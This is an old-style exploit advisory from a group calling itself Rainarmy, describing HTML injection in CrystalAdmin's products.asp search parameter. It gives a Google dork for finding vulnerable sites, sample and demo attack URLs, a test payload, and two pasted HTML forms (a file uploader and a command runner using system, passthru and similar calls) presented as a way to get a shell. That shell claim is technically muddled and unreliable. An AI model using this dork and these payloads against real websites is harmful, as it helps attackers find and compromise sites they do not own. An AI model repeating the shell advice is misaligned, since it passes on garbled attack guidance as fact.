################################################################# => Title: CrystalAdmin Html Injection Vulnerability => Author: silent => Credit: Rainarmy Security Team => Email: hacker.silent23@yahoo.com ################################################################## => Dork: inurl:/catalogue/products.asp?s= => Sample: http://www.target.com/catalogue/products.asp?s=[Html code] => Demo: http://www.aiXXXe.co.uk/catalogue/products.asp?s=[html code] => Html code: such az => <marquee>html injection</marquee> ################################################################### => for getting shell with html inject you should inject shell with html code such as this: <form action="?dir=." method="POST" enctype="multipart/form-data"> <tr> <td>Uploud file:<input name="uploadfile" value="" type="file" class="input" size="30" > <input name="doupfile" value="up" type="submit" class="input" size="30" > <input name="uploaddir" value="." type="hidden" class="input" size="30" > </td> </tr> </form> or an cmd shell like this : <form action="" method="POST" > <tr> <td>cmd:<select class="input" name="execfunc" > <option value="system">system</option><option value="passthru">passthru</option> <option value="exec">exec</option><option value="shell_exec">shell_exec</option> <option value="popen">popen</option></select> <input name="command" value="" type="text" class="input" size="30" > <input name="Run" value="command" type="submit" class="input" size="30" > </td> </tr> </form> also this trick works , when the safe mode is off. ################################################################### special thank to administrator , Data War , Time outer ################################################################### wwww.rainarmy.com & www.rainarmy.com/forums ###################################################################